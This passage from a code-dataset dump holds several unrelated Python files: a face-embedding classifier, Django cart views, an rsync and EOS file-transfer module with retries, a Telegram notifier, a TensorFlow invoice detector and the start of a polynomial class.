l2_normalize(coreModel.predict(images))\n            return emb, status\n        except Exception as e:\n            print(\"Error in AIengine.embed\")\n            print(e)\n            return None, False\n\n    def fitImg(self, images, labels):\n        try:\n            embs, status = self.embed(images)\n            self.classifier.fit(embs, labels)\n            return embs\n        except Exception as e:\n            print(\"Error in AIengine.fitImg\")\n            print(e)\n            return False\n\n    def fitVec(self, vectors, labels):\n        try:\n            embs, status = vectors # self.embed(images)\n            self.classifier.fit(embs, labels)\n            return embs\n        except Exception as e:\n            print(\"Error in AIengine.fitVec\")\n            print(e)\n            return False\n\n    def fit(self, data, labels, fitType='img'):\n        try:\n            lbls = list()\n            for i in labels:\n                if i not in self.labelEncodeMap:\n                    self.labelEncodeMap[i] = hash(i)\n                    self.labelDecodeMap[hash(i)] = i\n                lbls.append(self.labelEncodeMap[i])\n            print(self.labelEncodeMap)\n            return self.fitMap[fitType](data, lbls).tolist()\n        except Exception as e:\n            print(\"Error in AIengine.fit\")\n            print(e)\n            return False\n\n    def classifyImg(self, images, preprocess=True):\n        vectors, status = self.embed(images, preprocess)\n        val = [self.labelDecodeMap[i] for i in self.classifier.predict(vectors) if i in self.labelDecodeMap]\n        if len(val) == 0:\n            return None, False \n        return val, status\n\n    def classifyVec(self, vectors, preprocess):\n        if vectors is None:\n            return None, False\n        hashs = self.classifier.predict(vectors)\n        val = [self.labelDecodeMap[i] for i in hashs if i in self.labelDecodeMap]\n        for i in hashs:\n            if i not in self.labelDecodeMap:\n                print(\"hash \" + str(i) + \" Not in map\")\n        if val is None or len(val) == 0:\n            print(\"no class predicted\")\n            return None, False \n        return val, True\n\n    def classify(self, data, clfType='img', preprocess=True):\n        try:\n            return self.clfMap[clfType](data, preprocess)\n        except Exception as e:\n            print(clfType)\n            print(\"Error in AIengine.classify\")\n            print(e)\n            return None, False\n\n    def isSimilarII(self, img1, img2, margin=1.1):\n        try:\n            # embed() returns (embeddings, status); unpack before measuring distance\n            v1, _ = self.embed([img1])\n            v2, _ = self.embed([img2])\n            dis = distance.cosine(v1[0], v2[0])\n            if dis > margin:\n                return False\n            else:\n                return True\n        except Exception as e:\n            print(\"Error in AIengine.isSimilarII\")\n            print(e)\n            return None\n\n    def isSimilarIV(self, img, vec, margin=1.1):\n        try:\n            # vec is assumed to already be a 1-D embedding vector\n            v1, _ = self.embed([img])\n            v2 = vec\n            dis = distance.cosine(v1[0], v2)\n            if dis > margin:\n                return False\n            else:\n                return True\n        except Exception as e:\n            print(\"Error in AIengine.isSimilarIV\")\n            print(e)\n            return None\n\n    def isSimilarVV(self, vec1, vec2, margin=1.0):\n        try:\n            v1 = vec1\n            v2 = vec2\n            dis = distance.cosine(v1, v2)\n            print(dis)\n            if dis > margin:\n                return False\n            else:\n                return True\n        except Exception as e:\n            print(\"Error in AIengine.isSimilarVV\")\n            print(e)\n            return None\n
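\n    # Minimal usage sketch (illustrative only; the paths and vectors are assumed):\n    #   engine = AIengine('./models')\n    #   engine.isSimilarVV(vec_a, vec_b, margin=1.0)\n\n    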
@staticmethod\n def prewhiten(x):\n if x.ndim == 4:\n axis = (1, 2, 3)\n size = x[0].size\n elif x.ndim == 3:\n axis = (0, 1, 2)\n size = x.size\n else:\n raise ValueError('Dimension should be 3 or 4')\n\n mean = np.mean(x, axis=axis, keepdims=True)\n std = np.std(x, axis=axis, keepdims=True)\n std_adj = np.maximum(std, 1.0/np.sqrt(size))\n y = (x - mean) / std_adj\n return y\n\n @staticmethod\n def preprocess(images, margin=10, image_size=160, face_extract_algo=face_extract_dnn):\n try:\n faceDetected = True\n aligned_images = []\n detections = []\n for img in images:\n if type(img) is list:\n img = np.array(img)\n img = to_rgb(img)\n bb = dlib_model.getLargestFaceBoundingBox(img)\n if bb is None:\n print(\"dlib couldn't find any face, using dnn...\")\n aligned = img\n _img, faceDetected = face_extract_dnn(aligned, margin, image_size = image_size)\n # Comment above lines an uncomment below lines to ignore bad quality face images\n #continue\n else:\n aligned = dlib_model.align(img, bb=bb)\n if aligned is None:\n print(\"Error! No aligned photo\")\n aligned = img\n _img, ss = face_extract_dnn(aligned, margin, image_size = image_size)\n x, y, w, h = face_utils.rect_to_bb(bb)\n faceDetected = (x, y, x + w, y + h)\n if faceDetected is False:\n print(\"No face detected\")\n print(type(aligned))\n continue\n detections.append(faceDetected)\n aligned_images.append(_img)\n if len(aligned_images) == 0:\n return images, False\n return np.array(aligned_images), detections\n except Exception as e:\n print(\"Error in Preprocess \")\n print(e)\n return images, False\n\n def save(self, modelpath):\n self.modelpath = modelpath\n self.metadata = {'labelEncodeMap': self.labelEncodeMap, 'labelDecodeMap': self.labelDecodeMap,\n 'imagesize': self.image_size, 'similarity_margin': self.margin}\n f = open(modelpath+'/model.meta', 'wb')\n f.write(pickle.dumps(self.metadata))\n f.close()\n\n f = open(modelpath+'/model.pkl', 'wb')\n f.write(pickle.dumps(self.classifier))\n f.close()\n return True\n","repo_name":"AshishKumar4/Sketchula","sub_path":"InferenceRESTful/AIengine.py","file_name":"AIengine.py","file_ext":"py","file_size_in_byte":10102,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"70292699043","text":"# from asyncio.windows_events import NULL\nfrom django.shortcuts import render,get_object_or_404\nfrom django.http import JsonResponse\nfrom .cart import Cart\nfrom store.models import *\nfrom django.core.exceptions import ValidationError\nfrom django.views import View\nfrom django.utils.decorators import method_decorator\nfrom django.views.decorators.cache import cache_control\nfrom django.contrib.auth.mixins import LoginRequiredMixin\nfrom django.contrib import messages\nfrom django.template.loader import render_to_string\nfrom django.db import transaction\n\n@method_decorator(cache_control(no_cache=True, must_revalidate=True, no_store=True), name='get')\nclass cart_summaryView(LoginRequiredMixin,View):\n \n def get(self, request):\n\n if request.session.get('continue') == None:\n request.session['continue'] = True\n cart=Cart(request)\n cartItems=cart.cart_items_quantity()\n\n context={'cart':cart,'cartItems':cartItems}\n return render(request,'store/cart.html',context)\n\n\n\nclass cart_addView(LoginRequiredMixin,View):\n \n def post(self, request):\n \n cart=Cart(request)\n data = {\n 'msg': render_to_string('messages.html', {}),\n }\n\n productId=int(request.POST.get('productId'))\n\n try:\n product_qty=int(request.POST.get('productQty'))\n 
except ValueError:\n            msg='Please specify a correct amount'\n            messages.add_message(request, messages.ERROR, msg)\n            return JsonResponse({'data':data})\n        \n        with transaction.atomic():\n            product = Product.objects.select_for_update(nowait=True).get(id=productId)\n            \n            cartProductQuantity=cart.get_product_quantity(product.id)\n\n            if cartProductQuantity + product.availableQuantity > 10:\n                maxQuantity=10\n            else:\n                maxQuantity=cartProductQuantity + product.availableQuantity\n            \n\n            try:\n                if product_qty <= 10 and product_qty <= maxQuantity and product_qty > 0:\n                    cart.reserveProductQuantity(product=product,qty=product_qty)\n                    cart.add(product=product,qty=product_qty)\n                    messages.add_message(request, messages.SUCCESS, \"Item added to cart\")\n                else:\n                    raise ValueError('Ordered amount is not available')\n            except ValueError as ve:\n                msg=str(ve)\n                messages.add_message(request, messages.WARNING, msg)\n                \n                return JsonResponse({'data':data})\n\n\n            cart_qty=cart.__len__()\n            \n            \n            \n            user=request.user\n            customer,created=Customer.objects.get_or_create(\n                user=user,\n            )\n            \n            order,created=Order.objects.get_or_create(customer=customer,complete=False)\n            orderItem,created=OrderItem.objects.get_or_create(order=order,product=product)\n            \n            orderItem.quantity=product_qty\n            orderItem.save(update_fields=['quantity'])\n\n            response = JsonResponse({'qty':cart_qty})\n\n            return response\n\n\n\n\n    \nclass cart_deleteView(LoginRequiredMixin,View):\n    def post(self,request):\n        cart=Cart(request)\n        product_id=int(request.POST.get('productId'))\n        \n        \n        if request.POST.get('action') == 'post':\n            action2=request.POST.get('action2')\n            \n            cartItemQuantity=cart.get_product_quantity(product_id) \n            cart.delete(productId=product_id)\n            if cart.__len__():\n                cart_qty=cart.__len__()\n            else:\n                cart_qty=\"0\"\n            cart_total_price=cart.get_total_price()\n\n\n            user=request.user\n            customer,created=Customer.objects.get_or_create(\n                user=user,\n            )\n            \n            order,created=Order.objects.get_or_create(customer=customer,complete=False)\n            \n            with transaction.atomic():\n                product = Product.objects.select_for_update(nowait=True).get(id=product_id)\n            \n                orderItem,created=OrderItem.objects.get_or_create(order=order,product=product)\n            \n                if action2 == \"remove\":\n                    product.reservedQuantity-=cartItemQuantity\n                    product.save(update_fields=['reservedQuantity'])\n                    orderItem.quantity=0\n                    orderItem.save(update_fields=['quantity'])\n                    orderItem.delete()\n\n\n        response =JsonResponse({'cart_qty':cart_qty,'cart_total_price':cart_total_price})\n        return response\n\n\n\n\nclass cart_updateView(LoginRequiredMixin,View):\n    def post(self,request):\n        cart=Cart(request)\n        data = {\n            'msg': render_to_string('messages.html', {}),\n        }\n\n        if request.POST.get('action') == 'post':\n            \n            product_id=int(request.POST.get('productId'))\n            \n            try:\n                product_qty=int(request.POST.get('productQty'))\n            except ValueError:\n                msg='Please specify a correct amount'\n                messages.add_message(request, messages.ERROR, msg)\n                return JsonResponse({'data':data})\n\n            product_qty_max=int(request.POST.get('productQty'))\n            product=get_object_or_404(Product, id=product_id)\n            \n            try:\n                cartProductQty=cart.get_product_quantity(product.id)\n\n                if product_qty <= 10 and product_qty > 0 and product_qty <= product.availableQuantity + cartProductQty: \n                    cart.reserveUpdatedProductQuantity(product=product,qty=product_qty)\n                    cart.update(productId=product_id,qty=product_qty)\n                else:\n                    request.session['continue']=False\n                    raise ValueError('Ordered quantity for ' + product.name + ' cannot be higher than 10, higher than the remaining
 available quantity, or lower than 1; please correct your order quantity if you want to proceed')\n            \n            except ValueError as ve:\n                msg=str(ve)\n                messages.add_message(request, messages.ERROR, msg)\n            \n                return JsonResponse({'data':data})\n            \n\n            if request.user.is_authenticated:\n            \n                user=request.user\n                customer,created=Customer.objects.get_or_create(\n                    user=user, \n                )\n                \n                order,created=Order.objects.get_or_create(customer=customer,complete=False)\n                orderItem,created=OrderItem.objects.get_or_create(order=order,product=product)\n                \n                orderItem.quantity=product_qty\n                orderItem.save(update_fields=['quantity'])\n\n\n            product_price=cart.get_product_price(productId=product_id)\n\n            product_total_price=product_qty * product_price\n            \n            cart_qty=cart.__len__()\n            cart_total_price=cart.get_total_price()\n\n\n            response=JsonResponse({'cart_qty':cart_qty,'cart_total_price':cart_total_price,'product_total_price':round(product_total_price,2)})\n            return response\n\n\n\n\n\n\n\n\n\n\n\n","repo_name":"interlooop/Psearch-1","sub_path":"cart/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":7379,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"338922562","text":"#!/usr/bin/env python\n\n\"\"\" Handle and move files from the receiver(s) to Overwatch sites and EOS.\n\nThis simple module is responsible for moving data which is provided by the receiver to other\nsites. It will retry a few times if sites are unavailable.\n\nWe take a simple approach of determining which files to transfer and then moving them to the\nappropriate locations. We could try to use something like ``watchdog`` to do something more\nclever when a file changes. However, we want to batch transfer files to take advantage of\n``rsync``, so such an approach would require much more complicated bookkeeping (for example,\nwhat happens if a file shows up when transferring data, etc). The much simpler approach that\nwe use solves our problem just as well, but is also much easier to write and maintain.\n\n.. codeauthor:: Raymond Ehlers , Yale University\n\"\"\"\n\n# Python 2/3 support\nfrom __future__ import print_function\nfrom future.utils import iteritems\nfrom future.utils import itervalues\n\n# General\nimport os\nimport math\nimport time\nimport shutil\nimport subprocess\nimport tempfile\nimport functools\n\nimport ROOT\n\n# Logging\nimport logging\nlogger = logging.getLogger(__name__)\n\n# Config\nfrom . import config\n(parameters, filesRead) = config.readConfig(config.configurationType.processing)\n\ndef retry(tries, delay = 3, backoff = 2):\n    \"\"\" Retries a function or method until it returns ``True`` or runs out of retries.\n\n    Retries are performed at a specific delay with an additional back off term. The retries go\n    as\n\n    .. math::\n\n        t = delay * backoff^{nTry}\n\n    where :math:`nTry` is the trial that we are on. Note that 2 retries corresponds to three function\n    calls - the original call, and then up to two retries if the calls fail.\n\n    Original decorator from the `Python wiki `__,\n    and using some additional improvements `here `__,\n    and some ideas `here `__.\n\n    Args:\n        tries (int): Number of times to retry.\n        delay (float): Delay in seconds for the initial retry. Default: 3.\n        backoff (float): Amount to multiply the delay by between each retry. See the formula above.
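\n    Example (a minimal usage sketch; ``transferData`` and ``doTransfer`` are placeholder\n    names, not part of this module)::\n\n        @retry(tries = 2, delay = 1)\n        def transferData():\n            # Must return True on success; anything else triggers a retry.\n            return doTransfer()\n\n        # Up to three calls in total: the original call, then retries after 1 s and 2 s.\n        transferData()\n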
    Returns:\n        bool: True if the function succeeded.\n    \"\"\"\n    # Argument validation\n    if backoff <= 1:\n        raise ValueError(\"Backoff must be greater than 1.\")\n    tries = math.floor(tries)\n    if tries < 0:\n        raise ValueError(\"Tries must be 0 or greater.\")\n    if delay <= 0:\n        raise ValueError(\"Delay must be greater than 0.\")\n\n    def deco_retry(f):\n        @functools.wraps(f)\n        def f_retry(*args, **kwargs):\n            # Make mutable\n            mtries, mdelay = tries, delay\n\n            # First attempt at calling the function\n            rv = f(*args, **kwargs)\n            while mtries > 0:\n                # If we ever get a return value of `True`, we are done.\n                if rv is True:\n                    return True\n\n                # Setup for the next attempt and wait before the next attempt\n                mtries -= 1\n                time.sleep(mdelay)\n                mdelay *= backoff\n\n                # Try again\n                rv = f(*args, **kwargs)\n\n            # Ran out of tries. Return failure.\n            return False\n\n        # true decorator -> decorated function\n        return f_retry\n    # @retry(arg[, ...]) -> true decorator\n    return deco_retry\n\ndef determineFilesToMove(directory):\n    \"\"\" Determine the files which are available to be moved or otherwise transferred.\n\n    Since there could be additional directories which we want to ignore, we want to avoid\n    using ``os.walk()``, which will include subdirectories. Instead, we use a simpler solution\n    with ``os.listdir()`` and verify that we include only files.\n\n    Note:\n        These files are required to be ROOT files by requiring that they end with the ``.root`` extension.\n\n    Note:\n        We explicitly have to select the filenames on ``endswith(\".root\")`` rather than just ``\"root\" in f``\n        because ROOT creates temporary files of the form ``.desiredFilename.root.randomString`` where\n        ``randomString`` is usually 6 characters long. The files disappear almost immediately (and the\n        desired filename shows up). This is presumably to ensure that writes are atomic when writing new\n        objects. Thus, we want to avoid these temporary files. And we can do that by selecting that it ends\n        with \".root\".\n\n        The temporary ROOT files (detailed in the comments) failed with the following error:\n\n        .. code-block:: none\n\n            rsync: stat \"data/.EMChistos_294832_C_2018_10_22_9_53_55.root.izUVHA\" failed: No such file or directory (2)\n            rsync: rename \"data/.EMChistos_294832_C_2018_10_22_9_53_55.root.izUVHA\" -> \"EMChistos_294832_C_2018_10_22_9_53_55.root\": No such file or directory (2)\n            rsync error: some files/attrs were not transferred (see previous errors) (code 23) at main.c(1196) [sender=3.1.2]\n\n        Thanks to the retry capabilities, it will immediately retry, so this shouldn't cause a major problem\n        on the transfer side. However, it will cause problems on the receiver side because the malformed\n        filenames won't be handled properly by Overwatch.\n\n    Args:\n        directory (str): Path to the directory where the files are stored.\n    Returns:\n        list: List of the files available to be moved. 
Note that just the filenames are stored,\n so it's the callers responsibility to include the directory when using the filename.\n \"\"\"\n # NOTE: See the information above about why we explicitly select on ``endswith(\"root\")``.\n return [f for f in os.listdir(directory) if os.path.isfile(os.path.join(directory, f)) and f.endswith(\".root\")]\n\n@retry(tries = parameters[\"dataTransferRetries\"])\ndef rsyncFilesFromFilelist(directory, destination, filelistFilename, transferredFilenames):\n \"\"\" Transfer files via rsync based on a list of filenames in a given file.\n\n Note:\n This must be a separate function which returns a bool to work properly with the retry wrapper.\n Consequently, we return any transferred filenames by reference via ``transferredFilenames``.\n\n Args:\n directory (str): Path to the directory where the files are stored locally.\n destination (str): Path to the remote directory where the files are stored. Since the\n files are being transferred with rsync via ssh, this path should be of the form\n ``user@host:/dir/path``.\n filelistFilename (str): Filename of the file which contains the list of files to transfer.\n transferredFilenames (list): List of filenames which were transfer. Used to return this information\n because we have to return ``True`` or ``False`` with the retry wrapper.\n Returns:\n bool: True if the files were transferred successfully.\n \"\"\"\n # Check destination value. If we are testing, it doesn't need to have the \":\", but for normal operation,\n # it usually will.\n if \":\" not in destination:\n logger.warning(\"Expected, but did not find, \\\":\\\" in the destination path \\\"{destination}\\\".\".format(destination = destination))\n\n # Needed so that rsync will transfer to that directory!\n if not destination.endswith(\"/\"):\n destination = destination + \"/\"\n\n # Define the rsync command itself.\n rsync = [\n \"rsync\",\n # -l preserves symlinks.\n # -t preserves timestamps.\n # -h presents human readable information.\n # -v is verbose. (Not currently included).\n \"-lth\",\n # This outputs just the name of the file that is transferred.\n r\"--out-format=%n\",\n # Files from is relative to the remote path.\n \"--files-from={name}\".format(name = filelistFilename),\n # Source\n directory,\n # Destination\n destination,\n ]\n\n logger.debug(\"Args: {rsync}\".format(rsync = rsync))\n try:\n result = subprocess.check_output(args = rsync, universal_newlines = True)\n except subprocess.CalledProcessError:\n # The call failed for some reason. We want to handle it.\n logger.debug(\"rsync call failed!\")\n return False\n\n # NOTE: Getting to this point is equivalent to having a return code of 0.\n # Change: \"hello\\nworld\\n\" -> [\"hello\", \"world\"]\n parsedResult = result.strip(\"\\n\").split(\"\\n\")\n # Extend so we don't entirely reassign the reference.\n transferredFilenames.extend(parsedResult)\n\n logger.debug(\"Result: {}\".format(result))\n logger.debug(\"Result parsed: {}\".format(parsedResult))\n\n return True\n\ndef copyFilesToOverwatchSites(directory, destination, filenames):\n \"\"\" Copy the given files to the Overwatch deployment sites.\n\n The Overwatch sites and where the files should be stored at those sites is determined\n in the configuration. Retries should usually not be necessary here, but are included\n as an additional assurance.\n\n Args:\n directory (str): Path to the directory where the files are stored locally.\n destination (str): Path to the remote directory where the files are stored. 
Since the\n files are being transferred with rsync via ssh, this path should be of the form\n ``user@host:/dir/path``.\n filenames (list): Paths to files to copy to each Overwatch site.\n Returns:\n list: Filenames for all of the files which **failed**.\n \"\"\"\n # First write the filenames out to a temp file so we can pass them to rsync.\n with tempfile.NamedTemporaryFile() as f:\n # Need encode because the file is written as bytes.\n f.write(\"\\n\".join(filenames).encode())\n # Move back to the front so it can be read.\n f.seek(0)\n\n # Perform the actual files transfer.\n transferredFilenames = []\n success = rsyncFilesFromFilelist(directory = directory,\n destination = destination,\n filelistFilename = f.name,\n transferredFilenames = transferredFilenames)\n\n logger.debug(\"transferredFilenames: {}\".format(transferredFilenames))\n\n # We want to return the files that _failed_, so if the files were transferred,\n # we return an empty list. Otherwise, we return the files that were not transferred.\n failedFilenames = list(set(filenames) - set(transferredFilenames))\n return [] if success else failedFilenames\n\n@retry(tries = parameters[\"dataTransferRetries\"])\ndef copyFileToEOSWithRoot(directory, destination, filename):\n \"\"\" Copy a given file to EOS using ROOT capabilities.\n\n We include the possibility to show the ROOT ``cp`` progress bar if we are in debug mode.\n\n Args:\n directory (str): Path to the directory where the files are stored locally.\n destination (str): Directory on EOS to which the file should be copied.\n filename (str): Local filename of the string to be copied. This will be used for setting\n the path where it will be copied.\n Returns:\n bool: True if the file was copied successfully\n \"\"\"\n source = os.path.join(directory, filename)\n destination = os.path.join(destination, filename)\n # We only want to see such information if we are debugging. Otherwise, it will just clog up the logs.\n showProgressBar = parameters[\"debug\"]\n logger.debug(\"Copying file from {source} to {destination}\".format(source = source, destination = destination))\n return ROOT.TFile.Cp(source, destination, showProgressBar)\n\ndef copyFilesToEOS(directory, destination, filenames):\n \"\"\" Copy the given filenames to EOS.\n\n Files which failed are returned so that these files can be saved and the admin can be alerted to take\n additional actions.\n\n Args:\n directory (str): Path to the directory where the files are stored locally.\n destination (str): Directory on EOS to which the file should be copied.\n filenames (list): Files to copy to EOS.\n Returns:\n list: Filenames for all of the files which **failed**.\n \"\"\"\n failedFilenames = []\n for f in filenames:\n # This function will automatically retry.\n res = copyFileToEOSWithRoot(directory = directory, destination = destination, filename = f)\n # Store the failed files so we can notify the admin that something went wrong.\n if res is False:\n failedFilenames.append(f)\n\n return failedFilenames\n\ndef storeFailedFiles(siteName, filenames):\n \"\"\" Store failed files in a safe place for later transfer.\n\n This function should be called for each site. 
Each site maintains a different directory as different\n files could fail for different sites.\n\n Args:\n siteName (str): Name of the site for which the files failed to transfer.\n filenames (list): Filenames which failed to transfer.\n Returns:\n None.\n \"\"\"\n # Create the storage location if necessary and copy the files to it.\n storagePath = os.path.join(parameters[\"receiverDataTempStorage\"], siteName)\n if not os.path.exists(storagePath):\n os.makedirs(storagePath)\n\n for f in filenames:\n try:\n shutil.copy2(os.path.join(parameters[\"receiverData\"], f), os.path.join(storagePath, f))\n except shutil.Error as e:\n # Log the exception (so it will get logged and sent via mail when appropriate), and then\n # re-raise it so it doesn't get lost.\n logger.critical(\"Error in copying the failed transfer files. Error: {e}\".format(e = e))\n # raise with no arguments re-raises the last exception.\n raise\n\n # Sanity check that the files were successfully copied.\n # There can be other files in the directory, so we just need to be certain that the filenames\n # that we are handling here are actually copied.\n assert set(filenames).issubset(os.listdir(storagePath))\n\n # By logging, it will be sent to the admins when appropriate.\n # To ensure that we don't get overwhelmed by messages which only vary by the filename used, we\n # only include the sitename in the error. However, by printing the information at the info level,\n # it will be included via sentry, so we'll still have information the filenames which failed.\n logger.info(\"Files failed to copy for site {siteName}. Filenames: {filenames}\".format(siteName = siteName, filenames = filenames))\n logger.error(\"Files failed to copy for site {siteName}\".format(siteName = siteName))\n\ndef processReceivedFiles():\n \"\"\" Main driver function for receiver file processing and moving.\n\n This function relies on the values of \"receiverData\", \"receiverDataTempStorage\", \"dataTransferLocations\".\n\n Note:\n Configuration is controlled via the Overwatch YAML configuration system. In particular,\n the options relevant here are defined in the base module.\n\n Args:\n None.\n Returns:\n tuple: (successfullyTransferred, failedFilenames) where successfullyTransferred (list) is the\n filenames of the files which were successfully transferred, and failedFilenames (dict) is the\n filenames which failed to be transferred, with the keys as the site names and the values as the\n filenames.\n \"\"\"\n # These are just raw filenames.\n filenamesToTransfer = determineFilesToMove(directory = parameters[\"receiverData\"])\n\n if not filenamesToTransfer:\n logger.info(\"No new files found. 
Returning.\")\n        return None, None\n\n    logger.info(\"Transferring data to sites: {sites}\".format(sites = \", \".join(parameters[\"dataTransferLocations\"])))\n\n    failedFilenames = {}\n    for siteName, destination in iteritems(parameters[\"dataTransferLocations\"]):\n        transferFunc = copyFilesToOverwatchSites\n        if \"EOS\" in siteName.upper():\n            transferFunc = copyFilesToEOS\n        # Perform the actual transfer for each configured location.\n        # We need to keep track of which files failed to transfer to which sites.\n        failedFilenames[siteName] = transferFunc(directory = parameters[\"receiverData\"],\n                                                 destination = destination,\n                                                 filenames = filenamesToTransfer)\n\n    # Handle filenames which haven't been deleted.\n    # We only need to do this if there are some which failed.\n    # We also keep track of which failed for logging.\n    totalFailedFilenames = set()\n    if any(itervalues(failedFilenames)):\n        # Copy to a safe temporary location for storage until they can be dealt with.\n        # We make a copy and store them separately because the same file could have failed for multiple\n        # transfers. However, we shouldn't lose much in storage because these aren't intended to stay a\n        # long time.\n        for siteName, filenames in iteritems(failedFilenames):\n            totalFailedFilenames.update(filenames)\n            # Only attempt to store the failed files if some files actually failed.\n            if filenames:\n                storeFailedFiles(siteName = siteName, filenames = filenames)\n\n    # Log which filenames were transferred successfully.\n    # We will eventually want to return a list instead of a set, so we just convert it here.\n    successfullyTransferred = list(set(filenamesToTransfer) - totalFailedFilenames)\n    logger.info(\"Fully successfully transferred: {successfullyTransferred}\".format(successfullyTransferred = successfullyTransferred))\n\n    # Now we can safely remove all files, because any that have failed have already been copied.\n    # Protect from data loss when debugging.\n    if parameters[\"debug\"] is False:\n        for f in filenamesToTransfer:\n            os.remove(os.path.join(parameters[\"receiverData\"], f))\n    else:\n        logger.debug(\"Files to remove: {filenamesToTransfer}\".format(filenamesToTransfer = filenamesToTransfer))\n\n    return (successfullyTransferred, failedFilenames)\n\n","repo_name":"raymondEhlers/OVERWATCH","sub_path":"overwatch/base/dataTransfer.py","file_name":"dataTransfer.py","file_ext":"py","file_size_in_byte":18129,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"54"} +{"seq_id":"130616974","text":"def count(names):\n    more=0\n    less=0\n\n    for i in range(len(names)):\n        if len(names[i])>5:\n            more=more+1\n        else:\n            less=less+1\n\n    return more,less\nnames =[]\nx=int(input(\"How many names do you want to enter: \"))\nfor k in range(x):\n    names.append(input())\nmore,less=count(names)\nprint('Names with more than 5 characters: {} and names with 5 or fewer characters: {}'.format(more,less))\n\n    \n","repo_name":"Vipul2504/Python","sub_path":"stringassss.py","file_name":"stringassss.py","file_ext":"py","file_size_in_byte":419,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"32959253228","text":"import requests\n\nimport jesse.helpers as jh\nfrom jesse.config import config\n\n\ndef notify(msg):\n    \"\"\" Send a notification message (currently via Telegram).\n\n    :param msg: the message text to send\n    \"\"\"\n    _telegram(msg)\n\n\ndef _telegram(msg):\n    token = jh.get_config('env.notifications.telegram_bot_token', '')\n    chat_IDs: list = jh.get_config('env.notifications.telegram_chat_IDs', [])\n\n
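    # For reference, the configuration shape assumed by the lookups above (the key names\n    # come from the get_config() calls; the exact YAML layout is an assumption, not verified):\n    #\n    #   env:\n    #     notifications:\n    #       enable_notifications: true\n    #       telegram_bot_token: \"123456:ABC-DEF\"\n    #       telegram_chat_IDs:\n    #         - \"12345678\"\n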
    if not token or not len(chat_IDs) or not config['env']['notifications']['enable_notifications']:\n        return\n\n    for chat_id in chat_IDs:\n        requests.get(\n            'https://api.telegram.org/bot{}/sendMessage?chat_id={}&parse_mode=Markdown&text={}'.format(\n                token, chat_id, msg\n            )\n        )\n","repo_name":"dakshvar22/jesse","sub_path":"jesse/services/notifier.py","file_name":"notifier.py","file_ext":"py","file_size_in_byte":640,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"54"} +{"seq_id":"24198619945","text":"\"\"\"Module that performs invoice recognition.\r\n\"\"\"\r\n\r\n#%%\r\n\r\nimport numpy as np\r\n\r\nimport tensorflow.compat.v2 as tf\r\nimport matplotlib.pyplot as plt\r\n\r\nfrom object_detection.utils import label_map_util, visualization_utils\r\n\r\n#%%\r\n\r\nDIR_MODEL_EXPORTED = 'app/reconocimiento/model'\r\nPATH_TO_SAVED_MODEL = DIR_MODEL_EXPORTED + \"/saved_model\"\r\nLABEL_MAP_FILE = DIR_MODEL_EXPORTED + '/label_map.pbtxt'\r\n\r\n# %% In-memory initialization of the model\r\n\r\ndetect_fn = tf.saved_model.load(PATH_TO_SAVED_MODEL)\r\ncategory_index = label_map_util.create_category_index_from_labelmap(LABEL_MAP_FILE, use_display_name=True)\r\n\r\n\r\n# %% Load saved model and build the detection function\r\n\r\ndef nit_imagen(FILE):\r\n\r\n\r\n    # Load and preprocess the image\r\n    image_np = np.array(plt.imread(FILE))\r\n    input_tensor = tf.convert_to_tensor(image_np)\r\n    input_tensor = input_tensor[tf.newaxis, ...]\r\n\r\n\r\n    # Run object detection on the image\r\n    detections = detect_fn(input_tensor)\r\n\r\n    # Extract the detections\r\n    num_detections = int(detections.pop('num_detections'))\r\n    detections = {key: value[0, :num_detections].numpy()\r\n                  for key, value in detections.items()}\r\n    detections['num_detections'] = num_detections\r\n\r\n    # detection_classes should be ints.\r\n    detections['detection_classes'] = detections['detection_classes'].astype(np.int64)\r\n\r\n    return (category_index[detections['detection_classes'][0]]['name'], detections['detection_scores'][0], FILE)\r\n\r\n\r\n# %%\r\n\r\n# # Visualize the image\r\n\r\n# image_np_with_detections = image_np.copy()\r\n# visualization_utils.visualize_boxes_and_labels_on_image_array(\r\n#     image_np_with_detections,\r\n#     detections['detection_boxes'],\r\n#     detections['detection_classes'],\r\n#     detections['detection_scores'],\r\n#     category_index,\r\n#     use_normalized_coordinates=True,\r\n#     max_boxes_to_draw=200,\r\n#     min_score_thresh=.15,\r\n#     agnostic_mode=False)\r\n\r\n# plt.figure(figsize= (20,10))\r\n# plt.imshow(image_np_with_detections)\r\n# plt.show()\r\n\r\n","repo_name":"hdlopeza/jaco","sub_path":"vision/app_rnn.py","file_name":"app_rnn.py","file_ext":"py","file_size_in_byte":2057,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"2089485797","text":"#!/usr/bin/env python3\n\nclass Polynomial:\n    \"\"\" Class representing a polynomial \"\"\"\n    def __init__(self,*arg,**kwargs):\n        \"\"\" Initialize the polynomial object \"\"\"\n        self.polynomial = []\n        if(len(kwargs) != 0):\n            self.polynomial = []\n            order = max(int(key[1:]) for key in kwargs.keys())\n            for i in range(0,int(order)+1):\n                self.polynomial.append(0)\n            for key,value in kwargs.items():\n                index = int(key[1:])\n                self.polynomial[index] = value \n        \n        elif(len(arg) != 0):\n            if isinstance(arg[0],list):\n                self.polynomial = arg[0]\n            else:\n                self.polynomial = list(arg)\n            while self.polynomial[-1] == 0 and len(self.polynomial) != 1: \n                self.polynomial.pop()\n    \n    def __repr__(self):\n
